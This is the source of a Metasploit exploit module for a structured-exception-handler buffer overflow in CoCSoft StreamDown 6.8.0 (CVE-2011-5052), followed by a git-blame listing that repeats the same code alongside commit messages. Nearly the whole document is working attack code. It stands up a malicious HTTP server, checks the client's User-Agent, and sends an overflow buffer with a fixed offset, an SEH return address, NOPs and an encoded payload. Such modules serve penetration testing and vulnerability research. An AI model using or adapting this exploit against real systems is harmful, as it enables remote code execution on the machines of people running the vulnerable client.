metasploit-framework/modules/exploits/windows/misc/stream_down_bof.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CoCSoft StreamDown 6.8.0 Buffer Overflow',
      'Description'    => %q{
        Stream Down 6.8.0 seh based buffer overflow triggered when processing
        the server reponse packet.During the overflow a structured exception
        handler is overwritten.
      },
      'Author'         => 'Fady Mohamed Osman <fady.mohamed.osman[at]gmail.com>',
      'References'	 =>
        [
          ['CVE', '2011-5052'],
          ['OSVDB', '78043'],
          ['BID', '51190'],
          ['URL', 'http://www.dark-masters.tk/'],
          ['URL', 'http://secunia.com/advisories/47343/'],
          ['EDB', '18283']
        ],
      'Privileged'     => false,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Payload'        =>
        {
          'BadChars' => "\x00\xff\x0a"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'StreamDown 6.8.0',
            {
              'Offset' => 16388,
              'Ret'    => 0x10019448 #POP/POP/RET in DownloadMng.dll
            }
          ],
        ],
        'DisclosureDate' => 'Dec 27 2011', # as an actual security bug
        'DefaultTarget' => 0,
      'License'       => MSF_LICENSE
    ))
  end

  def on_request_uri(cli,request)
    vprint_status("Requested: #{request.uri}")

    # No point to continue if the client isn't what we interested in
    ua = request.headers['User-Agent']
    if ua !~ /CoCSoft Stream Download/i
      print_error("Target not supported: #{ua}")
      send_not_found(cli)
      return
    end

    nseh = "\xeb\x06" + rand_text_alpha(2)
    seh = [target.ret].pack('V')
    offset_to_nseh = target['Offset']
    nops = make_nops(10)
    sploit = rand_text_alpha(offset_to_nseh) + nseh + seh + nops + payload.encoded
    cli.put(sploit)
    close_client(cli)
  end
end
Add CoCSoft StreamDown buffer overflow (Feature #6168; no CVE or OSVDB ref) 2011-12-30 16:16:29 +00:00			`##`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
Add CoCSoft StreamDown buffer overflow (Feature #6168; no CVE or OSVDB ref) 2011-12-30 16:16:29 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = GoodRanking`
Add CoCSoft StreamDown buffer overflow (Feature #6168; no CVE or OSVDB ref) 2011-12-30 16:16:29 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::HttpServer`
Add CoCSoft StreamDown buffer overflow (Feature #6168; no CVE or OSVDB ref) 2011-12-30 16:16:29 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'CoCSoft StreamDown 6.8.0 Buffer Overflow',`
			`'Description' => %q{`
			`Stream Down 6.8.0 seh based buffer overflow triggered when processing`
			`the server reponse packet.During the overflow a structured exception`
			`handler is overwritten.`
			`},`
			`'Author' => 'Fady Mohamed Osman <fady.mohamed.osman[at]gmail.com>',`
			`'References' =>`
			`[`
			`['CVE', '2011-5052'],`
			`['OSVDB', '78043'],`
			`['BID', '51190'],`
			`['URL', 'http://www.dark-masters.tk/'],`
			`['URL', 'http://secunia.com/advisories/47343/'],`
			`['EDB', '18283']`
			`],`
			`'Privileged' => false,`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'seh',`
			`'InitialAutoRunScript' => 'migrate -f'`
			`},`
			`'Payload' =>`
			`{`
			`'BadChars' => "\x00\xff\x0a"`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[`
			`'StreamDown 6.8.0',`
			`{`
			`'Offset' => 16388,`
			`'Ret' => 0x10019448 #POP/POP/RET in DownloadMng.dll`
			`}`
			`],`
			`],`
			`'DisclosureDate' => 'Dec 27 2011', # as an actual security bug`
			`'DefaultTarget' => 0,`
			`'License' => MSF_LICENSE`
			`))`
			`end`
Add CoCSoft StreamDown buffer overflow (Feature #6168; no CVE or OSVDB ref) 2011-12-30 16:16:29 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def on_request_uri(cli,request)`
			`vprint_status("Requested: #{request.uri}")`
Add CoCSoft StreamDown buffer overflow (Feature #6168; no CVE or OSVDB ref) 2011-12-30 16:16:29 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`# No point to continue if the client isn't what we interested in`
			`ua = request.headers['User-Agent']`
			`if ua !~ /CoCSoft Stream Download/i`
			`print_error("Target not supported: #{ua}")`
			`send_not_found(cli)`
			`return`
			`end`
Add CoCSoft StreamDown buffer overflow (Feature #6168; no CVE or OSVDB ref) 2011-12-30 16:16:29 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`nseh = "\xeb\x06" + rand_text_alpha(2)`
			`seh = [target.ret].pack('V')`
			`offset_to_nseh = target['Offset']`
			`nops = make_nops(10)`
			`sploit = rand_text_alpha(offset_to_nseh) + nseh + seh + nops + payload.encoded`
			`cli.put(sploit)`
			`close_client(cli)`
			`end`
Add CoCSoft StreamDown buffer overflow (Feature #6168; no CVE or OSVDB ref) 2011-12-30 16:16:29 +00:00			`end`